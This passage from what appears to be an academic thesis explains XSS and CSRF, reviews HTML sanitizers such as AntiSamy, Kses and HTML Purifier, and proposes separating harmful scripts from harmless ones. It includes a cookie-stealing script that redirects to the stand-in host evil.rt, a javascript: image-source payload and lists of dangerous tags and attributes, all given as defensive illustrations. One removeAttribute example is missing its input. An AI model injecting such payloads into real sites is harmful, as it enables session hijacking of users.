The result of the defacement is shown in Figure 2.9. Website defacement, XSS-based or not, is an effective mechanism for manipulating the masses and establishing political and non-political points of view. Attackers can easily forge news items, reports and important data using any of these XSS attacks. It takes only a few people believing what they see to turn something fake into something real.
The examples in this section are taken from [JEG]; refer to it for many more real-world XSS attacks and examples.
Figure 2.9 Defacement
2.8 XSS Vs. CSRF
Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks are frequently confused because they are closely related [RRO]. Both attacks are aimed at the user and often require the victim to access a malicious web page. The potential consequences of the two attack vectors can also be similar: the attacker is able to submit certain actions to the vulnerable web application using the victim's identity. The causes of the two attack classes are different, though. A web application that is vulnerable to XSS fails to properly sanitize user-provided data before including it in a web page, thus allowing an attacker to include malicious JavaScript in the web application. This JavaScript is then executed by the victim's browser and initiates the malicious requests. XSS attacks have capabilities beyond the creation of HTTP requests and are therefore more powerful than CSRF attacks. A rogue JavaScript has almost unlimited power over the web page it is embedded in and is able to communicate with the attacker. For example, XSS can obtain and leak sensitive information.
Cross-Site Scripting (XSS) exploits the trust that a client has in the website or application: users generally trust that the content displayed in their browsers is what the website being viewed intended to display. In contrast, CSRF exploits the trust that a site has in the user: the website assumes that any 'action request' it receives was sent intentionally by the user [ROB].
In the case of an XSS flaw, the attacker exploits a lack of input and/or output filtering. Filtering out dangerous characters such as <, >, ", ', &, ; or # in an application could resolve the XSS flaw. XSS thus stems from the application performing insufficient data validation. XSS flaws may allow bypassing of any CSRF protections by leaking valid token values, by making Referer headers appear to originate from the application itself, or by hosting hostile HTML and JavaScript elements right in the target application. Therefore, resolving XSS flaws should be given priority over CSRF weaknesses [CSRF].
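Rather than deleting the dangerous characters, a common alternative is to encode them as HTML entities before echoing user data back into a page. The following is a minimal JavaScript sketch under that assumption; `escapeHtml` is a hypothetical helper intended only for HTML element content and quoted attribute values. It escapes &, <, >, " and '; once & is escaped, ; and # can no longer form a character reference, so in these contexts they need no separate treatment.

```javascript
// Hypothetical escapeHtml(): encodes untrusted text for HTML element content
// or a quoted attribute value. JavaScript, CSS and URL contexts need their
// own, different encoders.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(untrusted) {
  // One pass over the input, so the "&" of an entity produced here is never
  // encoded a second time.
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

console.log(escapeHtml('<script>alert("XSS")</script>'));
// &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
```

The script text is still displayed to the reader, but the browser treats it as text instead of executing it.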
XSS aims at inserting active code into an HTML document, either to abuse client-side active scripting holes or to send privileged information (e.g., authentication/session cookies) to an attacker-controlled site. CSRF does not rely on client-side active scripting at all; its aim is to take unwanted, unapproved actions on a site where the victim has some prior relationship and authority.
Where XSS seeks to steal the victim's online-trading cookies so that an attacker can manipulate the victim's portfolio, CSRF uses the victim's cookies to force the victim to execute a trade without his knowledge or consent.
CHAPTER 3
EXISTING XSS DEFENSES
There is a strong need for web applications to let users format their profiles or postings using Hypertext Markup Language / Cascading Style Sheets (HTML/CSS). To provide that functionality, developers must either allow users to supply their own source code directly or give them an intermediate language to work with.
As a simple solution, many lightweight markup languages other than HTML are available, such as BBCode [BBC], Wikitext [WIT], Markdown [MAD], Textile [TEX] and WYSIWYG editors. The message board system parses this markup and translates it into a markup language that web browsers understand (HTML or XHTML).
An example of intermediate-language code for rendering green text is shown below.
[color=green]Sample Text[/color]
After translation, the above code would be rendered to the user's browser in the target language, HTML/CSS, as seen below:
<font color="green">Sample Text</font>
This is a safe approach in general, because it does not allow users to specify arbitrary target-language code, which can be obfuscated and disguised using various encoding and fragmenting techniques. By providing an intermediate language and interpreting it in a top-down fashion, the application renders only the subset of HTML functionality that its developers wish to support.
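The top-down interpretation of an intermediate language can be sketched as follows. This is a hypothetical JavaScript translator for a tiny BBCode-like subset ([b], [i] and [color=...]), not the parser of any particular message board. The input is HTML-escaped first, so the only tags that can reach the browser are those the translator itself emits.

```javascript
// Hypothetical translator for a tiny BBCode-like subset. Escaping happens
// first, so user text can never contribute raw HTML of its own.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

function bbcodeToHtml(input) {
  let html = escapeHtml(input);
  // Only these patterns are translated; everything else stays plain text.
  html = html.replace(/\[b\]([\s\S]*?)\[\/b\]/g, "<b>$1</b>");
  html = html.replace(/\[i\]([\s\S]*?)\[\/i\]/g, "<i>$1</i>");
  // Colour values are restricted to plain names or #rgb / #rrggbb codes.
  html = html.replace(
    /\[color=([a-zA-Z]+|#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6})\]([\s\S]*?)\[\/color\]/g,
    '<font color="$1">$2</font>'
  );
  return html;
}

console.log(bbcodeToHtml("[color=green]Sample Text[/color]"));
// <font color="green">Sample Text</font>
```

Anything outside the whitelist, such as [color=red;x], is left untranslated as escaped plain text, which is exactly the "subset of HTML functionality" trade-off described in the text.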
There is a practical problem with this approach: the user is fairly limited in formatting, because the instruction set provided by the web application is unlikely ever to be as complete as the HTML/CSS specifications. Moreover, although the attributes and attribute values offered by these markup languages are not vulnerable in themselves, problems can still arise in the way the markup is translated into HTML/XHTML (i.e., the translated HTML is not necessarily secure).
The other option for providing formatting capability is to allow users to input HTML/CSS directly. If the user's input cannot be trusted, the application must be able to detect and remove any malicious code. Several solutions have been developed for this purpose; this chapter examines them one by one in detail.
3.1 AntiSamy
AntiSamy [ANT] (named in reference to Samy Kamkar's now-infamous MySpace XSS worm) was developed with the primary goal of creating an XSS filter that works on a positive and customizable security model. The secondary goal was to make the tool as user-friendly as possible, so that applications using it can tell users how their input was filtered or how they could adjust it to pass the filter.
AntiSamy first cleans the user-supplied input using NekoHTML, to avoid false positives caused by unbalanced start or end tags. NekoHTML is a stand-alone Java API that transforms broken HTML of any version into clean XHTML 1.0.
The main validation processing takes place in a depth-first fashion. Starting with the root, each node is processed according to the rules that the security-policy XML file defines for the node's name (e.g., html or input). There are three modes of validation (also called processing actions), filter, truncate and validate, each described below.
Filter
The filter processing action performs no validation per se; it only removes the start and end tags, promoting the tag's contents. This sanitization is useful in many cases. For example, if you decide that you do not want users to input meta tags that could interfere with search-engine robot indexing, setting filter would have the effect demonstrated below.
User Input: <meta name="expires;-1;www.phishingsite.com">This is some text.</meta>
Output after Filtering: This is some text.
Truncate
When the truncate processing action is set, no actual validation takes place. The truncate action simply removes all the attributes and child nodes of a tag, making validation of its attributes unnecessary. A number of tags should be set to truncate.
User Input: <br unknownAttributeAttack="1attack" onClick="alert(document.cookie)">
Output after Truncating: <br/>
Many formatting tags are set to truncate in the default policy file, including em, small, big, i, b, u, center, pre and more.
Validate
The validate processing action is where the meat of the filtering logic resides. If there are no attributes defined for a tag by the policy file, the validate processing action will act the same as the truncate processing action, except the child nodes will be validated instead of removed.
The validate action steps through each of the attributes in the tag to be filtered and checks if there is a corresponding entry for that tag and attribute combination in the policy file. If no entry is found, the attribute is simply removed. If there is an entry, the filter tries to validate its value against the rules in the entry.
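The depth-first processing with the three actions can be sketched as follows, assuming the input has already been parsed into a tree (AntiSamy relies on NekoHTML for that). The `POLICY` object and the `sanitize` function are hypothetical JavaScript stand-ins, not AntiSamy's Java/.NET code or its XML policy format. Value checking is left out here: "validate" simply keeps the attributes the policy lists for the tag.

```javascript
// Hypothetical policy: tag name -> processing action (and, for "validate",
// the attribute names allowed). AntiSamy's real policy lives in an XML file.
const POLICY = {
  meta: { action: "filter" },
  br: { action: "truncate" },
  p: { action: "validate", attributes: ["align"] },
  a: { action: "validate", attributes: ["href", "title"] },
};

// A node is either a text string or { tag, attrs, children }. The function
// returns an array because "filter" replaces one node with its children.
function sanitize(node) {
  if (typeof node === "string") return [node]; // text passes through
  const rule = POLICY[node.tag.toLowerCase()];
  if (!rule) return []; // tag absent from the policy: dropped (an assumption)
  if (rule.action === "truncate") {
    // Keep the bare tag: all attributes and child nodes are removed.
    return [{ tag: node.tag, attrs: {}, children: [] }];
  }
  const children = node.children.flatMap(sanitize); // recurse depth-first
  if (rule.action === "filter") return children; // drop tags, promote contents
  // "validate": keep only the attributes the policy lists for this tag.
  const allowed = rule.attributes || [];
  const attrs = {};
  for (const [name, value] of Object.entries(node.attrs)) {
    if (allowed.includes(name.toLowerCase())) attrs[name] = value;
  }
  return [{ tag: node.tag, attrs, children }];
}
```

A <p> containing the meta example above, a <br> with an onClick handler and a <script> element would come out as a <p> holding the promoted text and a bare <br>, with the script gone.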
There are two ways for an attribute value to be validated: by being equal to a literal string value, or by matching a regular expression. Accordingly, each attribute's definition in the policy can have a list of valid literal strings and a list of regular expressions to match. This is a departure from other XSS filters (and other security tools in general) that do not allow multiple ways to specify valid values, forcing the user to write overly complex (and likely incomplete or unpredictable) regular expressions.
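The two ways of accepting a value, a literal match or a regular-expression match, can be sketched as below. The rules in `ATTRIBUTE_RULES` and the `isValidAttribute` helper are illustrative assumptions, not entries from the real antisamy.xml.

```javascript
// Hypothetical per-attribute rules: a value is accepted if it equals one of
// the literals OR matches one of the regular expressions.
const ATTRIBUTE_RULES = {
  "p:align": { literals: ["left", "right", "center", "justify"], regexps: [] },
  "input:type": { literals: ["text", "password", "button", "submit"], regexps: [] },
  "a:href": {
    literals: [],
    regexps: [
      /^https?:\/\/[\w.-]+(\/[\w\/.%-]*)?$/i, // absolute http(s) URL
      /^\/(?!\/)[\w\/.%-]*$/,                 // site-relative path, not "//host"
    ],
  },
};

function isValidAttribute(tag, attr, value) {
  const rule = ATTRIBUTE_RULES[`${tag}:${attr}`.toLowerCase()];
  if (!rule) return false; // no policy entry: the attribute is removed
  const v = value.trim();
  // Literals are stored in lower case, so compare case-insensitively.
  return rule.literals.includes(v.toLowerCase()) || rule.regexps.some((re) => re.test(v));
}
```

Keeping short literal lists separate from the regular expressions means the expressions only have to describe genuinely open-ended values such as URLs.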
When an attribute does not pass a validation check, one of a few onInvalid actions is taken. The possible onInvalid actions dictate what to do with the tag and its contents. The set of onInvalid actions includes removeTag, filterTag and removeAttribute. The default action is removeAttribute.
If an attribute whose onInvalid action is set to removeTag fails validation, the tag holding that attribute is removed entirely, together with its contents. This onInvalid action is reserved for attributes whose removal would make the presence of the tag meaningless. An example usage of this setting is displayed below.
Welcome, my name is <script>
var cke = document.cookie;
var url = 'http://evil.rt/cookie.cgi?' + cke;
document.location = url;
</script>
and I'm 25 years old!
The above is the message posted by the user. The result after it fails validation is shown below:
Welcome, my name is and I’m 25 years old!
If an attribute with an onInvalid action set to filterTag fails validation, the start and end tag of the node will be removed while the contents are promoted. This is exactly what happens in the filter processing action. The process can be seen below.
<a href="javascript:alert('xss')">Click on this!</a>
The above is the message posted by the user. The result after passing this message to AntiSamy is:
Click on this!
The default onInvalid action is removeAttribute. When this onInvalid action is set (or if none is set) on an attribute that fails validation, the attribute itself is removed from the tag, but the tag and its contents will remain. The process is shown below.
The above is the message posted by the user. The result after passing this message to AntiSamy is:
<input type="button" value="Hi!">
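The three onInvalid actions can be summarised in a small hypothetical JavaScript helper, `applyOnInvalid`, operating on a simple { tag, attrs, children } node model. It is a sketch of the behaviour described above, not AntiSamy's code; the usage line reuses the javascript: link example.

```javascript
// Hypothetical helper: given a node whose attribute `badAttribute` failed
// validation, return the node(s) that should replace it.
function applyOnInvalid(node, badAttribute, action = "removeAttribute") {
  switch (action) {
    case "removeTag": // drop the tag and everything inside it
      return [];
    case "filterTag": // drop the tag but promote its contents
      return node.children;
    case "removeAttribute": { // default: keep the tag, drop the attribute
      const attrs = { ...node.attrs }; // copy, so the input is not mutated
      delete attrs[badAttribute];
      return [{ ...node, attrs }];
    }
    default:
      throw new Error(`unknown onInvalid action: ${action}`);
  }
}

const link = { tag: "a", attrs: { href: "javascript:alert('xss')" }, children: ["Click on this!"] };
console.log(applyOnInvalid(link, "href", "filterTag")); // [ 'Click on this!' ]
```

Returning an array lets all three actions share one signature: removeTag yields nothing, filterTag yields the children, and removeAttribute yields the cleaned tag.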
The knowledge base for the filter's engine is an XML file called antisamy.xml. The same policy file can be used across multiple implementations (.NET, J2EE, etc.). The default policy file was tailored to the W3C's HTML 4.0 and CSS 2.0 specifications, so any official attribute defined by those specifications can be used. If a user agent supports an attribute that is not specified, it can be added to the policy file, though some effort has already been put into integrating the non-standard attributes that are used and honored in the wild.
To summarize, OWASP AntiSamy is an API, implemented in Java and .NET, for ensuring that user-supplied HTML/CSS complies with an application's rules. It has very good XSS-cleaning abilities, since it removes anything it does not recognize. Architecturally, OWASP AntiSamy depends heavily on policy files, which are a highly extended form of XML Schema describing which elements and attributes to allow. As a result, the actual filtering code is relatively lightweight. Unfortunately, while XML Schema files can provide a high level of control over validation, the regular-expression-heavy approach begins to show signs of stress when data types are complex (e.g., URIs).
3.2 The strip_tags()
The PHP function strip_tags() [STT] is the classic solution for cleaning unwanted tags (like <script> or </script>) out of HTML. It is the worst of all solutions for avoiding XSS, because it does not validate attributes at all: anyone can insert malicious script into attributes like onmouseover='xss();' and exploit the application. While this can be patched with a series of regular expressions that strip out on[event] attributes, strip_tags() is fundamentally flawed and should not be used. An example of using strip_tags() is illustrated below:
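<?php
$text = '<p>Test paragraph.</p><!-- Comment --> <a href="#fragment">Other text</a>';
echo strip_tags($text); // prints: Test paragraph. Other text
echo "\n";
// Allow <p> and <a>; prints: <p>Test paragraph.</p> <a href="#fragment">Other text</a>
echo strip_tags($text, '<p><a>');
?>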
In the above example, the first call strips all tags, while the second strips all tags except <p> and <a>. In this way, malicious tags such as <script>, <style> and <form> can be stripped out, but the values of attributes cannot be validated. To validate tag attributes, extra server-side code must be written, and such a solution is unlikely to be efficient and effective.
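The attribute problem can be reproduced with a rough JavaScript analogue of strip_tags() that keeps only an allowlist of tag names. `stripTags` is hypothetical and regex-based; it is not PHP's algorithm, but it shows the same weakness: an allowed tag keeps every attribute, including event handlers.

```javascript
// Hypothetical stripTags(): removes every tag whose name is not in `allowed`
// and leaves allowed tags exactly as written, attributes included.
function stripTags(html, allowed = []) {
  const keep = new Set(allowed.map((t) => t.toLowerCase()));
  // Matches start and end tags such as <a ...> or </script>.
  return html.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g, (tag, name) =>
    keep.has(name.toLowerCase()) ? tag : ""
  );
}

const post = '<a href="#" onmouseover="xss();">hover me</a><script>steal()</script>';
console.log(stripTags(post, ["a"]));
// <a href="#" onmouseover="xss();">hover me</a>steal()
```

The <script> tags disappear, yet the onmouseover handler on the permitted <a> tag passes through untouched.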
3.3 PHP Input Filter
PHP Input Filter [PIF] is an upgraded version of strip_tags() with the ability to inspect attributes. PHP Input Filter implements an HTML parser and performs only very basic checks on whether tags and attributes have been defined in the whitelist (the user decides what to permit). Since it does not check well-formedness at all, it is trivially easy to trick the filter into leaving unclosed tags. Any application that allows the style attribute is in serious trouble, because CSS cannot simply be let through without the layout being badly mutilated.
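The missing well-formedness check can be sketched with a stack: each start tag is pushed, each end tag must match the most recent unclosed start tag, and nothing may remain open at the end. `isBalanced` and its list of void elements are hypothetical and regex-based, so this is an illustration rather than a full HTML parser.

```javascript
// Hypothetical isBalanced(): stack-based start/end tag matching.
// Void elements such as <br> never take an end tag.
const VOID_ELEMENTS = new Set(["br", "hr", "img", "input", "meta", "link"]);

function isBalanced(html) {
  const open = []; // stack of tag names still waiting for their end tag
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)\b[^>]*?(\/?)>/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const [, closing, rawName, selfClosing] = m;
    const name = rawName.toLowerCase();
    if (VOID_ELEMENTS.has(name) || selfClosing) continue; // never needs closing
    if (!closing) {
      open.push(name);
    } else if (open.pop() !== name) {
      return false; // end tag does not match the innermost open tag
    }
  }
  return open.length === 0; // anything left open is an unclosed tag
}

console.log(isBalanced("<b><i>text</i></b>")); // true
console.log(isBalanced("<b><i>text</b>"));     // false
```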
3.4 HTML_Safe/SafeHTML
HTML_Safe/SafeHTML [HTS] works by parsing HTML with a SAX parser and performing validation and filtering as the handlers are called. Whereas strip_tags() can only strip tags, HTML_Safe strips all active content, including tags, attributes and attribute values. The parser strips the following potentially dangerous content from HTML:
opening tag without its closing tag
closing tag without its opening tag
any of these tags: "base", "basefont", "head", "html", "body", "applet", "object", "iframe", "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound", "link", "meta", "style", "title", "blink", "xml" etc.
any of these attributes: on*, data*, dynsrc
expression/behavior etc. in styles
any other active content
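A blacklist check in the spirit of the rules listed above can be sketched as follows. The helpers are hypothetical JavaScript, not HTML_Safe's PHP code; the tag list is the one quoted above (without its "etc."), and treating any attribute name that starts with "on" or "data" as dangerous mirrors the on* and data* patterns.

```javascript
// Hypothetical blacklist helpers modelled on the HTML_Safe rules above.
const DANGEROUS_TAGS = new Set([
  "base", "basefont", "head", "html", "body", "applet", "object", "iframe",
  "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound",
  "link", "meta", "style", "title", "blink", "xml",
]);

function isDangerousTag(tagName) {
  return DANGEROUS_TAGS.has(tagName.toLowerCase());
}

// on* (event handlers), data* and dynsrc attributes are rejected outright.
function isDangerousAttribute(attrName) {
  const name = attrName.toLowerCase();
  return name.startsWith("on") || name.startsWith("data") || name === "dynsrc";
}

// expression(...) and behavior: inside a style value are rejected as well.
function isDangerousStyle(styleValue) {
  return /expression\s*\(|behavior\s*:/i.test(styleValue);
}
```

Because whole tags such as style or applet land in DANGEROUS_TAGS, everything they could legitimately do is lost too, which is the loss of functionality criticised in the next paragraph.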
It also tries to convert the code into valid XHTML, but htmltidy is a far better solution for this task. HTML_Safe does a lot of things right, such as blacklisting dangerous attributes, but blacklisting entire tags (like style, applet, etc.) merely because they have some dangerous attributes results in a loss of functionality. In addition, it blocks all occurrences of XSS simply by stripping them off.
3.5 Kses
Kses [KSS] is an HTML/XHTML filter written in PHP. It removes all unwanted HTML elements and attributes, and it also performs several checks on attribute values (to avoid buffer overflow attacks). Kses can be used to avoid XSS, as it only allows the HTML elements and attributes that it has been explicitly told to allow. It also removes stray "<" and ">" characters that people may try to sneak in. The API functions that Kses offers its users are listed and explained below.
Table 3.1: Kses APIs
API | Functionality
Parse($string = "") | The basic function of kses. Given a $string, it strips out the unwanted HTML and attributes.
AddProtocols() | Adds a protocol or list of protocols to the kses object, to be considered valid during a Parse(). The parameter can be a string containing a single protocol, or an array of strings, each containing a single protocol.
Protocols() | Deprecated. Use AddProtocols().
AddProtocol($protocol = "") | Adds a single protocol to the kses object that will be considered valid during a Parse().
SetProtocols() | A straight setting/overwrite of the existing protocols in the kses object. All existing protocols are removed, and the parameter determines which protocol(s) the kses object will consider valid. The parameter can be a string containing a single protocol, or an array of strings, each containing a single protocol.
DumpProtocols() | Returns an indexed array of the valid protocols contained in the kses object.
DumpElements() | Returns an associative array of the valid (X)HTML elements in the kses object, along with the attributes for each element and the tests that will be performed on each attribute.
AddHTML($tag = "", $attribs = array()) | Allows the end user to add a single (X)HTML element to the kses object, along with the attributes (if any) that the element is allowed to have.
RemoveProtocol($protocol = "") | Allows the removal of a single protocol from the list of valid protocols in the kses object.
RemoveProtocols() | Allows single or batch removal of protocols from the kses object. The parameter is either a string containing a protocol to be removed, or an array of strings that each contain a protocol.
filterKsesTextHook($string) | For the OOP (Object Oriented Programming) version of kses, an additional hook that allows the end user to perform additional post-processing of a string being run through Parse().
Configuring and using the Kses APIs is simple and flexible: the user can set the protocols to allow or disallow, and can configure the API to add or remove elements or attributes from the preconfigured Kses. Users must be very cautious when using the APIs, as different ways of using them result in different behaviour. However, Kses is not a very good option, as it has many loopholes that have been publicly exposed by its users [GEL].
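The protocol whitelist that Kses manages through calls like AddProtocol() and RemoveProtocol() can be sketched as below. `ProtocolFilter` is a hypothetical JavaScript class, not the Kses API. It assumes HTML character references in the URL have already been decoded, and it conservatively removes spaces and control characters before reading the scheme, because browsers ignore tabs and newlines inside URLs (so "java\tscript:" still runs).

```javascript
// Hypothetical ProtocolFilter, loosely modelled on the Kses protocol calls.
class ProtocolFilter {
  constructor(protocols = ["http", "https", "ftp", "mailto"]) {
    this.protocols = new Set(protocols.map((p) => p.toLowerCase()));
  }
  addProtocol(protocol) { this.protocols.add(protocol.toLowerCase()); }
  removeProtocol(protocol) { this.protocols.delete(protocol.toLowerCase()); }
  setProtocols(list) { this.protocols = new Set(list.map((p) => p.toLowerCase())); }

  // True if the URL is relative or uses a whitelisted protocol.
  isAllowed(url) {
    const cleaned = url.replace(/[\u0000-\u0020]/g, "").toLowerCase();
    const match = /^([a-z][a-z0-9+.-]*):/.exec(cleaned);
    if (!match) return true; // no scheme: treated as a relative URL
    return this.protocols.has(match[1]);
  }
}

const filter = new ProtocolFilter();
console.log(filter.isAllowed("http://example.com/"));   // true
console.log(filter.isAllowed("java\tscript:alert(1)")); // false
```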
3.6 htmLawed
In its developers' words, the highly customizable htmLawed [HTM, HTL] filter can be used to make text with HTML more secure and policy-compliant. It can auto-correct and beautify HTML markup and restrict the HTML elements (tags), attributes and URL protocols in the input. It also balances tags and checks for proper nesting of HTML elements. Furthermore, it can transform deprecated tags and attributes, check and convert character entities (e.g., from hexadecimal to decimal form), obfuscate email addresses as an anti-spam measure, etc. The feature set htmLawed provides is impressive, but it simply strips off every occurrence of script: it does not validate scripts or differentiate a simple script from XSS.
On the other hand, web researchers [HTP] say that htmLawed is a modified version of Kses (with some features added). It simply strips off the script tag to prevent script execution, and its validation of attribute values is weak (it allows inclusion of cgi/javascript/html files, which may lead to XSS).
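Converting character entities to a single form, one of the htmLawed features listed above, helps a filter because later checks then only have to recognise one notation. A minimal JavaScript sketch of the hexadecimal-to-decimal step follows; `hexToDecimalEntities` is a hypothetical name and this is not htmLawed's code.

```javascript
// Hypothetical hexToDecimalEntities(): rewrites hexadecimal character
// references such as &#x3C; in their decimal form (&#60;).
function hexToDecimalEntities(text) {
  return text.replace(/&#x([0-9a-f]+);/gi, (_, hex) => `&#${parseInt(hex, 16)};`);
}

console.log(hexToDecimalEntities("&#x3C;script&#x3E;")); // &#60;script&#62;
```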
3.7 Safe HTML Checker
Safe HTML Checker [SHC] is of the same flavour as the others, but it is a well-written piece of code, strict in checking and parsing tags. It is a whitelisting filter that removes every tag not found in its filter list, and it is very strict in filtering out all occurrences of script and CSS (Cascading Style Sheets). Safe HTML Checker was developed to satisfy the requirements shown below.
1. Entered markup should be valid XHTML Strict, to stop comments from breaking validation and to keep things nice and tidy.
2. No presentational markup! They wanted the web administrator to have complete control over style sheets, and posted comments should only be able to use structural HTML elements.
3. Attributes should be restricted to those that add semantic meaning. JavaScript event attributes and CSS-related attributes should not be allowed.
4. Web Administrator should retain full control over the tags and attributes allowed in the comments.
5. Submitted HTML must be kept free from anything that could pose a security risk, such as javascript: URLs.
To satisfy these requirements, the developer of Safe HTML Checker was not much concerned about the loss of functionality caused by his solution.
3.8 HTML Purifier
HTML Purifier [HTP] is a standards-compliant HTML filter library written in PHP. Its developers claim that it removes all scripting code through thorough auditing, which again results in a loss of functionality. Like all the other existing solutions, it strips off every occurrence of script.
3.9 Summary
Regarding the available API/tool support, the present situation is not at all encouraging. Even a combination of all these approaches is not promising for web application security, since hardly any tool supports the proper approach. The absence of a holistic approach to identifying genuine XSS attacks is a serious concern for web application security.
CHAPTER 4
PROBLEM STATEMENT
A simple script inserted in a message is very often mistaken for an XSS attack. Scripting is functionality provided for a better user experience, yet existing solutions always assume that any inserted script is malicious and strip it. For example, alert("XSS") is not malicious, because it does not harm the user. In contrast, alert(document.cookie) is malicious, because it accesses a browser DOM object (the session cookie) that is supposed to be secure; this may lead to hijacking of the user's session. In security terms, an attack is something that harms a legitimate user. Hence we claim that merely inserting a script does not constitute an XSS attack.
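The distinction drawn above can be illustrated with a deliberately naive keyword heuristic that flags a script only when it touches sensitive browser objects. `looksMalicious` and its pattern list are assumptions made for this illustration, not the detection rules of the API developed in this thesis; simple obfuscation such as document['coo' + 'kie'] defeats it.

```javascript
// Hypothetical heuristic: a script is suspicious only if it touches one of
// these sensitive objects. The list is an illustrative assumption.
const SENSITIVE_PATTERNS = [
  /document\s*\.\s*cookie/i,     // session cookie theft
  /document\s*\.\s*location/i,   // redirection
  /window\s*\.\s*location/i,
  /window\s*\.\s*open\s*\(/i,    // opening attacker pages
  /document\s*\.\s*write\s*\(/i, // rewriting the page (defacement)
  /XMLHttpRequest/i,             // silent requests
];

function looksMalicious(script) {
  return SENSITIVE_PATTERNS.some((re) => re.test(script));
}

console.log(looksMalicious('alert("XSS")'));          // false
console.log(looksMalicious("alert(document.cookie)")); // true
```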
Having understood XSS attacks, another challenge we identified in safeguarding users from them is whether to adopt a server-side or a client-side solution. A client-side solution can help users who are security-conscious, who are familiar with XSS attacks and who have some technical expertise (needed to use the solution provided), but such a solution may not help novice users.
This project aims at developing a holistic server-side XSS API that differentiates XSS attacks from simple scripts and strips off only the attacks. Novice users can thus enjoy a safe and better browsing experience without any loss of functionality, additional software or browser-side configuration. Such an API also reduces the burden on web administrators of safeguarding their web applications from malignant XSS attacks.
CHAPTER 5
DIFFERENTIATING XSS FROM SIMPLE SCRIPTS
Chapter 3 analysed the available and widely used solutions for XSS, and Chapter 4 discussed the gaps these solutions leave open and the new problems that arise from them. This chapter presents our solution to the problem identified.
It is well known that XSS occurs because an attacker inserts malicious script into a web application. Before determining what makes a script malicious, we should therefore determine where an attacker can insert malicious script into the web application. When the markup languages were designed, none of the tags or attributes was meant for malicious purposes; they were made for genuine use, but attackers abuse them for their own profit (typically name, fame or theft). From our observations, we compiled a list of tags and attributes that give an attacker scope to insert malicious script; it is shown in Table 5.1:
Table 5.1: Tags and their attributes that favour attackers
Tag | Attribute
form | action
body | background
applet | code
object | data
a, area, link | href
iframe, frame, img | longdesc
a, area, button, input, label, select, textarea | onblur
input, select, textarea | onchange
a, abbr, acronym, address, area, tt, i, b, small, big, body, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, form, h1 - h6, input, ins, label, legend, li, link, map, menu, noframes, noscript, ol, hr, img, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody, td, textarea, tfoot, th, thead, tr, u, ul | onclick, ondblclick, onkeydown, onkeypress, onkeyup, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup
body, frameset | onload
a, area, button, input, label, select, textarea | onfocus
input, textarea | onselect
form | onsubmit
body, frameset | onunload
frame, iframe, img, input, script | src
a, abbr, acronym, address, applet, area, tt, i, b, small, big, basefont, bdo, blockquote, body, br, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, font, form, frame, frameset, h1 - h6, hr, iframe, img, input, ins, label, legend, li, link, map, menu, noframes, noscript, object, ol, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody, td, textarea, tfoot, th, thead, tr, u, ul | style
Knowing that the above tags and attributes give an attacker scope to insert malicious script, we must next understand how an attacker can make use of them. The full set of attributes found to be vulnerable can be divided into three categories:
1. Attributes that pull in content from outside the actual page, such as href, src, etc., through which a page or object with malicious content can be included in the existing page.
2. Attributes that allow the user to write script directly, such as onload, onmouseover, onclick, etc., through which malicious script can be included.
3. Attributes that allow the user to style his content, such as style.
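Sorting an attribute into one of these three categories can be sketched as follows. `categorizeAttribute` is a hypothetical helper; the URL-valued names are those this chapter lists for the first category, and treating every name that begins with "on" as an event handler is an assumption.

```javascript
// Hypothetical categorizeAttribute(): maps an attribute name to one of the
// three categories above, or "other" if it belongs to none of them.
const URL_ATTRIBUTES = new Set([
  "action", "background", "classid", "code", "data", "href", "longdesc", "src",
]);

function categorizeAttribute(name) {
  const attr = name.toLowerCase();
  if (URL_ATTRIBUTES.has(attr)) return "external-content"; // category 1
  if (attr.startsWith("on")) return "script";              // category 2
  if (attr === "style") return "style";                    // category 3
  return "other";
}

console.log(categorizeAttribute("SRC"));         // external-content
console.log(categorizeAttribute("onMouseOver")); // script
```

Each category can then be routed to a different check: an extension or protocol test for the first, script analysis for the second and CSS inspection for the third.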
The differences between these three categories are best understood through examples. The first category is the set of attributes that include external objects or content in the current page. To illustrate how these attributes can be abused, consider the <input> tag of type image. For such a tag, external image content is supplied through an attribute called "SRC", and the image is displayed in the existing page. An attacker, however, supplies malicious script instead of the image location. One such example is shown below; it displays the session cookie in an alert box every time the page is loaded. An alert by itself is not malicious, but since this one exposes the user's session cookie, which is supposed to be secure, it is considered malicious.
<INPUT TYPE="IMAGE" SRC="javascript:alert(document.cookie);">
The attributes that belong to this category are: action, background, classid, code, data, href, longdesc, src.
Attributes of this type should be restricted in the external content they allow, based on the tag and the attribute. The extensions allowed for each tag and attribute are shown in Table 5.2:
Table 5.2: Extensions allowed
Tag | Attribute | Allowed Extensions
img, input (type=image) | src, lowsrc, dynsrc | .jpg, .jpeg, .png, .xbm, .gif, .bmp
a, area, link | href | .htm, .html, .asp, .jsp, .php, .aspx, .swf, .rb, .pl, .cgi
frame, iframe | src | .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx
Any tag | longdesc | .txt, .rtf, .doc
embed | src | .pdf, .doc, .wav
Any tag | background | .jpg, .jpeg, .png, .xbm, .gif, .bmp
script | src | This attribute is not allowed
applet | code | .class
object | classid | .class, .py, .rb
object | data | .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx, .flv, .mov, .wmv, .rm, .ra, .ram
